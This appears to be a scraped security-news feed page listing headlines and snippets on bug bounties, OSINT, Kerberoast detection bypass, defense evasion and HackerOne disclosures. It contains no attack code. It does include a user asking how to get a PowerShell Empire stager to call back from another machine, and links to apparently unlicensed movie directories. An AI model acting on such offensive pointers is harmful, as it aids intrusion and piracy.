    4 Videos to Help You At The Start of Your Infosec/Hacking Career
    No content preview
  • Open

    4 Videos to Help You At The Start of Your Infosec/Hacking Career
    No content preview
  • Open

    fastjson反序列化漏洞分析1
    拉通历史版本分析了一下fastjson漏洞
  • Open

    Let’s become Invincible and learn Defense Evasion :-
    Hey all, back again with another awesome writeup and thanks all of you for reading and loving my writeups. I hope you all are learning… Continue reading on Medium »
  • Open

    Use FFuF with BurpSuite
    For other FFuF use cases, please refer to: Use FFuF to Perform Directory Brute-Forcing — by Lejing Huang Use FFuF to Perform API Fuzzing —… Continue reading on Medium »
    Use FFuF to Perform API Fuzzing
    For other use cases of FFuF, you can refer to: Use FFuF to perform Directory Brute-forcing — by Lejing Huang Use FFuF with BurpSuite — by… Continue reading on Medium »
  • Open

    Use FFuF with BurpSuite
    For other FFuF use cases, please refer to: Use FFuF to Perform Directory Brute-Forcing — by Lejing Huang Use FFuF to Perform API Fuzzing —… Continue reading on Medium »
    Use FFuF to Perform API Fuzzing
    For other use cases of FFuF, you can refer to: Use FFuF to perform Directory Brute-forcing — by Lejing Huang Use FFuF with BurpSuite — by… Continue reading on Medium »
  • Open

    An AI Based Solution to Detecting the DoubleZero .NET Wiper
    Unit 42 presents a machine learning model to predict maliciousness of .NET samples based on file structures, by analyzing the DoubleZero .NET wiper. The post An AI Based Solution to Detecting the DoubleZero .NET Wiper appeared first on Unit 42.

  • Open

    Can USB Wall Adapters Store and Transfer Data?
    Question in the title. Just wondering since I'm worried about being hacked using one submitted by /u/No_Trash_9832 [link] [comments]
    Are network switches safe without needing to run any diagnostics or anything?
    I bought a network switch from a local place. My friend told me it’s simple, I run one Ethernet cable from my router to the switch, and then run two or three short Ethernet cables from the switch to my PS5, Apple TV, Xbox, etc — and they will all be on Ethernet with zero meaningful delay or loss of quality. Am I overthinking it? Aren’t I plugging a third party device directly into my network and it can see all traffic? In theory couldn’t this contain malware? submitted by /u/will-succ-4-guac [link] [comments]
    CVE Vulnerability Tracking
    Does anyone have any go to RSS feeds that update daily of CVEs? Tried using opencve RSS feed but that just doesn't seem to either work or pick up many CVEs rated 7 and above. Tried NVD put there's no way to differentiate between low scoring CVEs and high scoring ones (wanting to focus more on the high scoring CVEs). Cheers! submitted by /u/cryptobfoo [link] [comments]
  • Open

    Remediation Archeology — Finding and Decoding an Ancient XSS
    One of my favorite pastimes in Bug Bounty is reviewing my ancient (read: 2 or 3 years old) vulnerability reports. I feel like I’ve come a… Continue reading on Medium »
    How I found CVE-2022–40088
    Hey Squad, Continue reading on Medium »
    How i found 8 vulnerabilities in 24h?
    Hello Awesome Hackers, I hope you all doing well! My name is Mohamed Anani Or 0xM5awy. Continue reading on Medium »
    How to Hide Your Website’s Front-End For Increased Security
    TL;DR- If you’re creating any website to showcase to others, you’ll want to make your site as secure as possible, while staying optimized. Continue reading on The Gray Area »
    $250 for Email account enumeration using “NameToMail” tool
    Hi amazing hackers. Continue reading on Medium »
    Explaining vulnerabilities : Cross Site Scripting (XSS)
    Cross-Site Scripting (or XSS) is one of the most common bugs reported to bug bounty programs. It’s so prevalent that, every single year… Continue reading on Medium »
    Dorking: The hidden filters….
    People use normal search queries but hackers used special filters for searching unique and hidden items on both surfaces and the dark web… Continue reading on Medium »
    The Best Ways to Exploit Rate Limit Vulnerabilities
    TL;DR- If you’re into bug bounties or just white-hat hacking in general, you’ve probably heard of no-rate-limit vulnerabilities Continue reading on The Gray Area »
  • Open

    OSINT Tip #2 — Rewards Programs
    Rewards programs can be leveraged in order to associate a name with a phone number. Anytime you’re asked to provide a phone number when… Continue reading on Medium »
    Lost at Sea — Hacktoria Contract Walkthrough (Understanding OSINT)
    In this article we are going to solve a new contract from Hacktoria called as “Lost at Sea”. Continue reading on Medium »
    Frühwarnsystem Social Media: Videostream dokumentiert live Tierquälerei und häusliche Gewalt
    Live auf der Videostreaming Plattform Twitch misshandelt ein angeblich Jugendlicher seine Mutter, wird selbst misshandelt und vergeht sich… Continue reading on Medium »
  • Open

    New recon tool!
    Just released csprecon - Reconnaissance tool based on Content Security Policy https://github.com/edoardottt/csprecon #github #security #infosec #bugbounty submitted by /u/edoardottt [link] [comments]
  • Open

    Open Redirect at
    U.S. Dept Of Defense disclosed a bug submitted by angeltsvetkov: https://hackerone.com/reports/1634105
    IDOR on [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by nightm4re: https://hackerone.com/reports/1627974
    Reflected XSS | https://
    U.S. Dept Of Defense disclosed a bug submitted by x3ph_: https://hackerone.com/reports/1736432
    Reflected XSS | https://
    U.S. Dept Of Defense disclosed a bug submitted by x3ph_: https://hackerone.com/reports/1736433
    LOGJ4 VUlnerability [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by fklet: https://hackerone.com/reports/1624137 - Bounty: $1000
    Default password on 34.120.209.175
    Elastic disclosed a bug submitted by newspaper: https://hackerone.com/reports/1415241 - Bounty: $245
    Directory Listing at https://...
    8x8 disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1771051
  • Open

    Forensic Image to Review Tool
    We have been plagued by this problem over and over & have used various techniques to get around it so I thought I would reach out and ask. How are you getting data from a forensic image (e01 for example) ready for review tools (like Relativity)? I appreciate you all btw! TIA submitted by /u/Original-Face-9933 [link] [comments]
    Remote collection
    Im 100% sure there are a OSS that allows you to create a ISO that you can send to a person, and when they boot it, it starts doing a harddrive forensic image that are sent via ssh to a server you set up. anyone know what im talking about? submitted by /u/Hispan [link] [comments]
  • Open

    Collection of vulnerable code snippets (updated every friday)
    This Github repository contain several different code snippets vulnerabilities to practice your code analysis. The code snippets are beginner friendly but suitable for all levels! Hope you will like it 🤘 submitted by /u/hisxo [link] [comments]
    Explaining AWS Encryption Access: A Deep Dive on KMS Access and KMS Key Grants
    submitted by /u/jsonpile [link] [comments]
  • Open

    Ibexa DXP patched for GraphQL password hash leak vulnerability
    Article URL: https://portswigger.net/daily-swig/ibexa-dxp-patched-for-graphql-password-hash-leak-vulnerability Comments URL: https://news.ycombinator.com/item?id=33658257 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-11-18 Review
    Akamai 在新观察到的域名中每月可标记 1300 万恶意域名 by Avenger Brute Ratel C4 Badger分析实战与检测 by ourren 网络空间测绘视角下的乌克兰网络脆弱性分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-18 Review
    Akamai 在新观察到的域名中每月可标记 1300 万恶意域名 by Avenger Brute Ratel C4 Badger分析实战与检测 by ourren 网络空间测绘视角下的乌克兰网络脆弱性分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    Soundfonts; aimed at video game makers so it seems
    https://soundfonts.kor.ninja/ Soundfonts and sample set. For those that don't use them - a soundfont is a library of sounds you load into an instrument on your computer. You could download a violin soundfont, and playback the violin sounds across a kyeboard instrument, for example. submitted by /u/Loscha [link] [comments]
    This browser extension lets you browse web accessible folders like a file explorer
    I recently discovered this open directories thingy and I though it was very cool. But I didn't like the UI on these pages that much. I thought it'd be cool if I could see thumbnails for atleast images and videos before clicking them. I then asked in this subreddit for a solution but I didn't like any that much. I then decided to build my own browser extension which would let me view the web folder similar to how a file explorer would. This is what I came up with. Please give it a try and let me know what improvement would you like on it. https://i.redd.it/qfooa0bvjp0a1.gif Images are not loaded in their original size/resolution, they are sent to a backend and the backend compresses the images, which are shown as thumbnail, they are usually around 5-10kb in size, so is it saves a lot of data for you. Original images are loaded as fallback if the backend fails to compress an image. ​ HOW TO USE: Simply open any directory page and click the extension icon which appears to the right of your address bar OR press ALT+Z as a shortcut. Then the page will switch to file explorer view which lets you view info (or preview video/image thumbnails) of the directory items. You can toggle the items size or sort the items as well. DOWNLOAD IT HERE: https://microsoftedge.microsoft.com/addons/detail/file-explorer/aofbajadmbkdagnfajjaghakabgifdfp I have only published it to Microsoft Edge addons because it is free, Google has a fee to register as a chrome extensions developer which I don't want to pay YET. Only drawback I see for using edge is that it doesn't support extensions on the File:// protochol, which means this extension won't work if you tried to view your local files in Edge browser. It does work on other chromium browsers though. submitted by /u/uzair7866 [link] [comments]
    Previous post, now, new and improved with TITLES
    Found via a previous post. These are all essentially the same, just a couple different ways to access... https://fsa.remotestre.am/Movies/ https://fsa.remotestre.am/Shows/ https://fsa.remotestre.am/ https://45.148.120.91/Movies/ https://45.148.120.91/Shows/ https://45.148.120.91/ however, here's the secret sauce. Find the titles via this site: https://watcha.movie/movie/ the Download Link matches - in most cases I tested - the number in the OD. NSFW cause there's some boobies. submitted by /u/Bonus_Personal [link] [comments]
    Interesting collection of PDF eBooks.
    Mysticism, Nature Cures, Occult. https://avalonlibrary.net/ebooks/ submitted by /u/Shitemoji69 [link] [comments]
    Any workprint collectors on here?
    Hi, new to this forum. Are there any workprint collectors on here? submitted by /u/Fun-Barracuda-6375 [link] [comments]
  • Open

    Hacking with Hydra — A Practical Tutorial
    Hydra is a fast password cracker used to brute-force and gain access to network services like SSH & FTP. Continue reading on Stealth Security »
    Hacking with Hydra — A Practical Tutorial
    Hydra is a fast password cracker used to brute-force and gain access to network services like SSH & FTP. Continue reading on Stealth Security »
    Hacking with Hydra — A Practical Tutorial
    Hydra is a fast password cracker used to brute-force and gain access to network services like SSH & FTP. Continue reading on Stealth Security »
    Git Exposed — How to Identify and Exploit
    What is Git? Continue reading on stolabs »
  • Open

    CIS 2022深圳分会场议题前瞻 | 高级威胁与漏洞管理论坛
    11月23日,CIS 2022深圳分会场将准时进行,万分期待新老朋友们莅临现场,重温线下见面的温度。
    榜单发布 | WitAwards 2022中国网络安全行业年度评选结果
    在CIS 2022网络安全创新大会上海主会场,历时2个多月的WitAwards 2022中国网络安全行业年度评选迎来了最后的结果揭晓时刻。
    国家网信办修订《互联网跟帖评论服务管理规定》发布施行
    新《规定》明确,跟帖评论服务提供者应当按照用户服务协议对跟帖评论服务使用者和公众账号生产运营者进行规范管理。
    市场监督总局、国家网信办发布《个人信息保护认证实施规则》
    《规则》规定了对个人信息处理者开展个人信息收集、存储、使用、加工、传输、提供、公开、删除以及跨境等处理活动进行认证的基本原则和要求。
    《关键信息基础设施安全保护要求》三版内容对比分析
    总体来看,2021版标准与正式版调整较小,只有个别地方做了修改,而相比2019版送审稿的变化较大。
    FreeBuf周报 | 安卓系统遭重大风险,可轻松破解锁屏;谷歌服软!3.9亿美金求和解
    一个复杂的网络钓鱼工具包一直以北美用户为目标,利用劳动节和万圣节等假期,对消费者发动攻击。
    考证不?真枪实弹的那种~CCSS-R培训开班啦!
    国家级认证,公安部三所指导,CCSS评价——王炸!
    FBI通缉10年的JabberZeus头目“坦克”被瑞士警方逮捕
    11月17日消息,一名被美国通缉了十年的乌克兰人在10月23日被瑞士当局在日内瓦逮捕,他是网络犯罪团伙JabberZeus成员之一。
    年末购物季将至,一复杂钓鱼工具正针对北美消费者
    一个复杂的网络钓鱼工具包一直以北美用户为目标,利用劳动节和万圣节等假期,对消费者发动攻击。
    臭名昭著的Hive勒索软件,从1300多名受害者手中勒索1亿美元
    美国联邦调查局(FBI)今天表示,自2021年6月以来,臭名昭著的Hive勒索软件团伙已经从一千多家公司成功勒索了大约1亿美元。
    如何提高CICD管道安全性?
    数字化进程加速使得产品的开发和迭代节奏变快,在加速产品发布的同时,CI/CD也容易受到网络安全问题的影响,如代码损坏、安全错误配置和机密管理不当。
  • Open

    WordPress 插件 WOOCS 从 LFI 到 RCE 的漏洞分析
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/2DqN3EsHqG24AjMy8scecA 漏洞简述 WooCommerce Currency Switcher (WOOCS)是WooCommerce的多货币插件,它允许你的网站访问者根据设定的货币汇率实时切换产品价格的货币,并以选定的货币支付。允许为WooCommerce商店添加任何货币...
  • Open

    WordPress 插件 WOOCS 从 LFI 到 RCE 的漏洞分析
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/2DqN3EsHqG24AjMy8scecA 漏洞简述 WooCommerce Currency Switcher (WOOCS)是WooCommerce的多货币插件,它允许你的网站访问者根据设定的货币汇率实时切换产品价格的货币,并以选定的货币支付。允许为WooCommerce商店添加任何货币...

  • Open

    Powershell-empire
    Hello, I’m completely new to cyber-security and kali linux, so I'm using kali linux in vmware and I've been watching tutorials on how hackers remotely control a pc using powershell-empire. So I wanted to test it on myself using powershell-empire by creating a windows/launcher_bat stager. The problem is that when I send the launcher.bat to my other windows 10 laptop and open it, it doesn't return the agent. But if I send it to the same pc that l'm using (my windows 10 pc that I’m using kali linux from using vmware), it returns the agent. So does anyone know why it doesn't return the agent on my other windows 10 laptop and how to fix it? submitted by /u/Ah-Hell_nah [link] [comments]
    Dataset I can test IDS/IPS tools against?
    I am doing a university project and I need to find a problem (network security vulnerability) which I then need to test solutions like IDS/IPS’ against datasets I only know of DARPA 1998 dataset is there any other datasets? Also any recommendations on which tools to use? Many thanks. submitted by /u/Much_Wonder2000 [link] [comments]
    Pihole receiving thousands of dns requests to higi.com
    Hello, I am fairly new to home networking and network security. I recently set up a pihole mainly to have fun and tinker around. Over the past 2 days, I have observed thousands of queries to higi.com. The requests are coming from my router, which is to be expected as all my other devices pass through the router before hitting the pi. Does anyone have steps I should take to figure out which device is sending the requests, or other things I can do to remedy the situation? I have already blocked the domain both at my router and at the pi. submitted by /u/dinkx3 [link] [comments]
    SQL injection with only letters and numbers, is it possible?
    let say that a server sanitize sql query by only allowing letters and numbers, is sql injection still possible this way? I've read some people say that it's still possible but none of them gave any example. submitted by /u/Chillseashells [link] [comments]
    Is there an actual public “blacklist” of known malicious domains?
    I’m working on a browser plug-in that will search a user’s inbox for potential phishing emails. I would love to be able to run a sender domain against a .csv file of known malicious domains as part of this check. Does anyone know if such a list exists publicly? Thanks! submitted by /u/kipduck [link] [comments]
    My dad ‘s visa got stolen
    Hello, My dad was purchasing something from a Facebook page ,and he entered his vida details on their websites. I know its his mistake and its an idiot phishing scam but my dad as many seniors isn’t updated on technology. What can he do now? I told him to send me a screenshot from the bank ‘s name and the facebook page or their website . But it’s s 99% scam. He was purshaing something , it deduct the amount . Then now it deducted another huge amount without his consent. I feeel that any security knowledge i have is useless and that i can’t help. I feel the only way or anyone who can do anything is the bank. submitted by /u/Ramseesthe4th [link] [comments]
    Serverless Architecture / Spyware
    Is it possible to use/manipulate serverless architecture in such a way that it could effectively emulate spyware when the target device is running VPN? For example: Eventbridge (Zerista Ver. 332.4 Build 2022.18.04.10) submitted by /u/ZTS001 [link] [comments]
    How do I go back into penetration testing successfully?
    Hey there :) I'm currently working in web development (approaching 6 months in my current position) but I keep having moments of really wanting to return to penetration testing. I've been in IT a few years now and hacking is what initially drove me to the industry (I even got OSCP certified and passed the first time.) Along with that I did discover an enjoyment for programming too and I am a capable programmer, but I'm still drawn towards hacking. I've never quite got the same satisfaction out of anything that I get when I discover a vulnerability in something and whenever I think of projects in my personal time, my mind jumps towards rooting HTB machines or developing tools to automate penetration testing (I've had a particular idea of 'HackerHarold', a desktop application that automates the enumeration process and handles tests on the OS itself.) I would also love to start playing around with malware development again. However, I had no luck whatsoever in finding a job as a Penetration Tester prior to working in Web Development. I never even got through to the interview stage despite having a Tumblr blog full of work I've done and being OSCP-certified. I guess what I'm looking for is advice on how to get back into the industry and how to secure a job as a Penetration tester? I do also have web dev experience now too which I can imagine will be beneficial, but I'm not even sure if 6 months of that is enough. My blog is here: https://c-cracks.tumblr.com/ I haven't done much of anything recently due to university and work but I dropped one of my uni modules for the year (was taking up all of my time) so I am in a position to dedicate a day a week to my goal. submitted by /u/mehFFS123 [link] [comments]
  • Open

    [PDF, research paper] Do Users Write More Insecure Code with AI Assistants?
    submitted by /u/ScottContini [link] [comments]
    New Tool: Orpheus - Bypasses most Kerberoast Detections
    submitted by /u/ben0xa [link] [comments]
    Packet Tuesday: New video series about in depth network traffic analysis
    submitted by /u/dentalfoss [link] [comments]
    Infosys leaked FullAdminAccess AWS keys on PyPi for over a year
    submitted by /u/Most-Loss5834 [link] [comments]
  • Open

    Awesome Bug-Bounty
    A curated list of awesome bug-bounty tools and resources. Continue reading on Medium »
    Reflected XSS using Double Encoding
    Bypassing XSS filters using Double Encoding Continue reading on Medium »
    How to Get Into Bug Bounties?( Beginner’s guide)
    Hello Future Bug Bounty Hunters! Continue reading on Medium »
    Daily Web App Security | 28 of 100 | Bug bounty basics
    In today’s article, we introduce you to the world of bug bounties Continue reading on Medium »
    Information Exposure — My Fourth Finding on Hackerone!
    Information Exposure Through Directory Listing — The bug title says everything about it. Find a path or URL on any website that's enable… Continue reading on Medium »
  • Open

    Browser Login Data Dates Earlier than Laptop Date
    I used Axiom to parse browser data on a laptop installed in 2022. Axiom found logins within Chrome's Login Data file and Firefox's logins.json, many of which were "created" as early as 2011. Is this an indication that the browser profiles were created on another computer and copied over to the 2021 laptop? Could there be another explanation for the large date gap? submitted by /u/Lazy_perv [link] [comments]
    FTKimager unable to run and is a gear icon.
    submitted by /u/AlienDumpling [link] [comments]
  • Open

    Backgrounds...
    Well if you still like revolving Backgrounds on your desktop here is a few Link... prob a re-post, but I lost lots of images so went looking again... submitted by /u/xanderTgreat [link] [comments]
    Tons of assorted (mostly old ham) radio books. (Plus a lot of other interesting things: history of video tape recording...) [45G]
    submitted by /u/NullVoidPointer [link] [comments]
  • Open

    The Spy Who Vanished — Hacktoria Contract Walkthrough (Understanding OSINT)
    In this article we are going to solve a hacktoria contract called “The spy who vanished”. Continue reading on Medium »
    Gmail OSINT —  Extracting information from a Gmail address
    In this article we are going to talk about, the information that you can extract from a Gmail (Google email) address (because most people… Continue reading on System Weakness »
    Gmail OSINT —  Extracting information from a Gmail address
    In this article we are going to talk about, the information that you can extract from a Gmail (Google email) address (because most people… Continue reading on Medium »
    SEINT: Polish OSINT expert and trainer
    Discussing Misinformation, Social Engineering and OPSEC Continue reading on Medium »
    KPMG2022 : BluehoaxBullhoax(OSINT)
    สวัสดีครับ ก็สำหรับหัวข้อ KPMG2022 : BluehoaxBullhoax(OSINT) ซึ่งเป็นโจทย์จากงานการเเข่งขัน “KPMG Cyber Security Challenge 2022” ครับ… Continue reading on Medium »
    OSINT in Metaverse
    OSINT stands for Open Source Intelligence which is gathering information or doing reconnaissance through the sources which are present in… Continue reading on Medium »
    Beginner
    I have a new hobby: OSINT. Or I think I do, if I can get over my paranoia about the hacker community. I assume any n00b who shows up with… Continue reading on Medium »
  • Open

    Gmail OSINT —  Extracting information from a Gmail address
    In this article we are going to talk about, the information that you can extract from a Gmail (Google email) address (because most people… Continue reading on System Weakness »
    Gmail OSINT —  Extracting information from a Gmail address
    In this article we are going to talk about, the information that you can extract from a Gmail (Google email) address (because most people… Continue reading on Medium »
  • Open

    Vulnerability Management at Lyft: Enforcing the Cascade [Part 1]
    Article URL: https://eng.lyft.com/vulnerability-management-at-lyft-enforcing-the-cascade-part-1-234d1561b994 Comments URL: https://news.ycombinator.com/item?id=33642995 Points: 2 # Comments: 0
  • Open

    Meta’s new kill chain model tackles online threats
    submitted by /u/FOSS_Lover [link] [comments]
  • Open

    API tokens and Emails leaked lead to sensitive information Disclosure
    ZeroBounce disclosed a bug submitted by devdevirl: https://hackerone.com/reports/1776711
    CSRF in AppSearch allows creation of "curations"
    Elastic disclosed a bug submitted by dee-see: https://hackerone.com/reports/1477050 - Bounty: $833
  • Open

    SecWiki News 2022-11-17 Review
    SecXOps安全智能分析技术白皮书 by ourren 战场智能指挥系统 DELTA 深度分析报告 by ourren JNDI注入工具改造 by SecIN社区 基于统计与变异分析的缺陷变量定位技术 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-17 Review
    SecXOps安全智能分析技术白皮书 by ourren 战场智能指挥系统 DELTA 深度分析报告 by ourren JNDI注入工具改造 by SecIN社区 基于统计与变异分析的缺陷变量定位技术 by ourren 更多最新文章,请访问SecWiki
  • Open

    Frida & Objection without Jailbreak!
    No content preview
    Only 1 Month Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Frida & Objection without Jailbreak!
    No content preview
    Only 1 Month Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Frida & Objection without Jailbreak!
    No content preview
    Only 1 Month Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    The Art of Bypassing Kerberoast Detections with Orpheus
    Back in May of 2018, I wrote a blog post detailing the steps I took to detect Kerberoast (T1558.003) attacks. This research allowed us to help organizations build a detection for when a threat actor requests the Kerberos ticket for accounts with a service principal name established. In this blog post, I am going to... The post The Art of Bypassing Kerberoast Detections with Orpheus appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 一波兰公民被俄安全局拘捕;美称伊朗黑客入侵联邦机构
    据今日俄罗斯电视台网站报道,俄罗斯联邦安全局在16日发布的一份声明中表示,一名持有外交护照的波兰公民因涉嫌参与莫斯科一项走私计划被拘捕。
    快看看有你没!数百个亚马逊 RDS 泄露了用户信息
    亚马逊关系型数据库服务(Amazon RDS)上数百个数据库正在暴露用户个人身份信息(PII)。
    Twitter 源代码表明,端到端加密私信即将到来
    马斯克对揭秘该功能的推文回复了一个“眨眼”的表情,暗示该功能确实正在开发中。
    谷歌将于2023年在安卓13中引入隐私沙盒
    隐私沙盒旨在创建技术来保护人们的在线隐私,限制秘密跟踪。
    11月的上海CIS 2022,我看到了网安行业大会回暖的信号
    11月16日,CIS 2022网络安全创新大会在上海宝华万豪酒店顺利举行。
    中美俄首次参与网安演习,明年将面对面对抗
    会议内容包括网络安全跨国演习,这将是中美俄首次共同参与此类演习。
  • Open

    404星链计划 | 新加载4个开源安全项目 点击查看
    关于星链计划 「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划,这个计划的初衷是将404实验室内部一些工具通过开源的方式发挥其更大的价值,也就是“404星链计划1.0”,这里面有为大家熟知的Pocsuite3、ksubdomain等等,很快我们就收到了许多不错的反馈。2020年11月,我们将目光投向了整个安全圈,以星链计划成员为核心,筛选优质、有意义、有趣、坚持...
    Linux 内核 cls_route 过滤器 UAF 漏洞(CVE-2022-2588)分析与验证
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/Qs_-CTZyojRe_x8E0KiXMg 一、 前言 数月前,国外安全组织ZDI研究人员披露了一个Linux内核本地权限提升漏洞,该漏洞出现在流量控制子系统包分类器的cls_route过滤器中,当旧过滤器句柄为0时,在释放之前内核不会从哈希表中将其删除,其漏洞编号为CVE-2022-2588,而且还...
    Android 组件逻辑漏洞漫谈
    作者:evilpan 原文链接:https://mp.weixin.qq.com/s/shbmbR0AizKHJSAJsLSbfA 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 随着社会越来越重视安全性,各种防御性编程或者漏洞缓解措施逐渐被加到了操作系统中,比如代码签名、指针签名、地址随机化、隔离堆等等,许多...
    [HEVD Exploit] Windows 内核漏洞 StackOverflowGS 利用学习
    作者:zoemurmure 原文链接:https://mp.weixin.qq.com/s/d8Mac01ncK6_Xtf1piNE8Q 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0. 前言 HackSys Extreme Vulnerable Driver (HEVD) 是出于学习内核的漏洞利用技巧而开发...
  • Open

    404星链计划 | 新加载4个开源安全项目 点击查看
    关于星链计划 「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划,这个计划的初衷是将404实验室内部一些工具通过开源的方式发挥其更大的价值,也就是“404星链计划1.0”,这里面有为大家熟知的Pocsuite3、ksubdomain等等,很快我们就收到了许多不错的反馈。2020年11月,我们将目光投向了整个安全圈,以星链计划成员为核心,筛选优质、有意义、有趣、坚持...
    Linux 内核 cls_route 过滤器 UAF 漏洞(CVE-2022-2588)分析与验证
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/Qs_-CTZyojRe_x8E0KiXMg 一、 前言 数月前,国外安全组织ZDI研究人员披露了一个Linux内核本地权限提升漏洞,该漏洞出现在流量控制子系统包分类器的cls_route过滤器中,当旧过滤器句柄为0时,在释放之前内核不会从哈希表中将其删除,其漏洞编号为CVE-2022-2588,而且还...
    Android 组件逻辑漏洞漫谈
    作者:evilpan 原文链接:https://mp.weixin.qq.com/s/shbmbR0AizKHJSAJsLSbfA 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 随着社会越来越重视安全性,各种防御性编程或者漏洞缓解措施逐渐被加到了操作系统中,比如代码签名、指针签名、地址随机化、隔离堆等等,许多...
    [HEVD Exploit] Windows 内核漏洞 StackOverflowGS 利用学习
    作者:zoemurmure 原文链接:https://mp.weixin.qq.com/s/d8Mac01ncK6_Xtf1piNE8Q 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0. 前言 HackSys Extreme Vulnerable Driver (HEVD) 是出于学习内核的漏洞利用技巧而开发...

  • Open

    Parsing atop files with python dissect.cstruct
    submitted by /u/DiabloHorn [link] [comments]
    Root RCE via CSRF (and other vulns) in F5 Big-IP devices [my original research]
    submitted by /u/iagox86 [link] [comments]
    HZ RAT goes China
    submitted by /u/OwnPreparation3424 [link] [comments]
    "Fangxiao: a Chinese Threat Actor" - by Cyjax researchers @nyxilar and @_nynan
    submitted by /u/_nynan [link] [comments]
    Is your VMware vSphere environment secure?
    submitted by /u/karimhabush [link] [comments]
  • Open

    Is SIEM dying off?
    I got hired at my current company because of my knowledge with SIEM appliances. To be honest tho, I spend more of my time and get more value out of dealing with our Proofpoint email security platform, CASB, and our EDR appliance than I do our SIEM. I don't work for a company that is heavily audited. I'm not in the banking or medical industries so it's not a huge issue whether we have a 6-month backlog of logs or not. We're at the end of our fiscal year and starting to consider whether we should ditch our SIEM and spend that money on a more impressive EDR solution, or something like it. What do you all think? Should we look something newer and fancier, like an XDR solution? Is SIEM actually dying? submitted by /u/0wlBear916 [link] [comments]
    NetSec jobs?
    Hi; can you please give me some information about the "network security engineer" job market ? 1. Do you need to know how to configure on the spot without referring to documentation VPN's major changes to MPLS, BGP, etc.? 2. Is solid WAN knowledge required? 3. Approximately what % would be the network work on routers/switches? 4. Does it pay better than network engineer positions ( + AWS, automation )? 5. At what level is SD-WAN required in Network Engineer jobs? submitted by /u/Odd-Jump-3066 [link] [comments]
    Is it legal for vendors to scan my environment without my consent?
    A client reports to us that one of our machines has a vulnerability reported by a vendor. It sounds weird to me why someone scans our environment randomly without our consent and explores vulnerability. Is it common or this is industry practice? submitted by /u/alphasystem [link] [comments]
    Suggestions for SAST/DAST/SCA tool for DevOps/GitHub bonus if it has process/documentation functionality
    We have a number of different applications that are being developed internally and are looking for a SAST/DAST/SCA tool that can cover everything. There is a mix of technologies/languages in play. Visual Studio and Eclipse on the IDE side of things, Azure DevOps and GitHub for source control, languages are mostly JS, C#, ASP.NET, PHP with random other little things throughout. Also trying to find something that will help with threat modeling and managing the process/procedures/documentation around SDLC, bonus if this tool is included in the SAST. I spoke with Veracode, Checkmarx and Synopsys but this is out of my wheelhouse on what I am good at. Any suggestions on what to look at? submitted by /u/internetquestions21 [link] [comments]
  • Open

    I published a new tool for finding AV signatures in PowerShell scripts that can help guide obfuscation efforts.
    submitted by /u/pracsec [link] [comments]
    Become R00t — Linux Kernel Exploits
    submitted by /u/Clement_Tino [link] [comments]
  • Open

    Twitter Two-Factor Authentication Has a Vulnerability
    Article URL: https://www.bankinfosecurity.com/twitter-second-factor-authentication-has-vulnerability-a-20475 Comments URL: https://news.ycombinator.com/item?id=33631284 Points: 2 # Comments: 0
    Cyber vulnerability in networks used by spacecraft, aircraft and energy systems
    Article URL: https://news.umich.edu/cyber-vulnerability-in-networks-used-by-spacecraft-aircraft-and-energy-generation-systems/ Comments URL: https://news.ycombinator.com/item?id=33617377 Points: 1 # Comments: 0
  • Open

    [Git Gud] GitHub.com Svnbridge memcached deserialization vulnerability chain leading to Remote Code Execution
    GitHub disclosed a bug submitted by ajxchapman: https://hackerone.com/reports/1593913 - Bounty: $17500
    Ability to bypass locked Cloudflare WARP on wifi networks.
    Cloudflare Public Bug Bounty disclosed a bug submitted by joshatmotion: https://hackerone.com/reports/1635748 - Bounty: $1000
    RCE via github import
    GitLab disclosed a bug submitted by yvvdwf: https://hackerone.com/reports/1672388 - Bounty: $33510
    CSP-bypass XSS in project settings page
    GitLab disclosed a bug submitted by yvvdwf: https://hackerone.com/reports/1588732 - Bounty: $10270
    XSS: `v-safe-html` is not safe enough
    GitLab disclosed a bug submitted by yvvdwf: https://hackerone.com/reports/1579645 - Bounty: $6580
    New /add_contacts /remove_contacts quick commands susseptible to XSS from Customer Contact firstname/lastname fields
    GitLab disclosed a bug submitted by cryptopone: https://hackerone.com/reports/1578400 - Bounty: $13950
  • Open

    Announcing the Evmos Bug Bounty Program Supported By ImmuneFi
    We’d like to formally announce the launch of our new Evmos Bug Bounty Program in collaboration with ImmuneFi! Continue reading on Evmos Announcements »
    Frida & Objection without Jailbreak!
    So are you the one who stops security testing if Jailbreak Detection is not bypassed?? No worries, we have got you covered! A method to… Continue reading on InfoSec Write-ups »
    Writeup Bug Sistem Informasi Milik Dispendukcapil Kota Pasuruan
    Alhamdulillah hari ini laporan saya terkait bug pada web application milik Dispendukcapil Kota Pasuruan telah selesai diperbaiki. Continue reading on Medium »
    The Story Of A Strange / Stored IDOR.
    Story : Continue reading on Medium »
    Immunefi Launches Timebound Bug Bounty For Proof-of-Capital Vault System
    Starting today for the next three weeks, Immunefi is launching a Timebound Bug Bounty Program for its new, proof-of-capital Vault System. Continue reading on Immunefi »
    HOW TO CRAWL LINKS LIKE A PRO!
    Hi everyone! I hope you all are doing good. In this article, we are going to learn how we can crawl more links of a domain to increase our… Continue reading on Medium »
    Account Takeover worth of $2500
    whoami? Continue reading on Medium »
    DLL Hijacking Persistence Using Discord
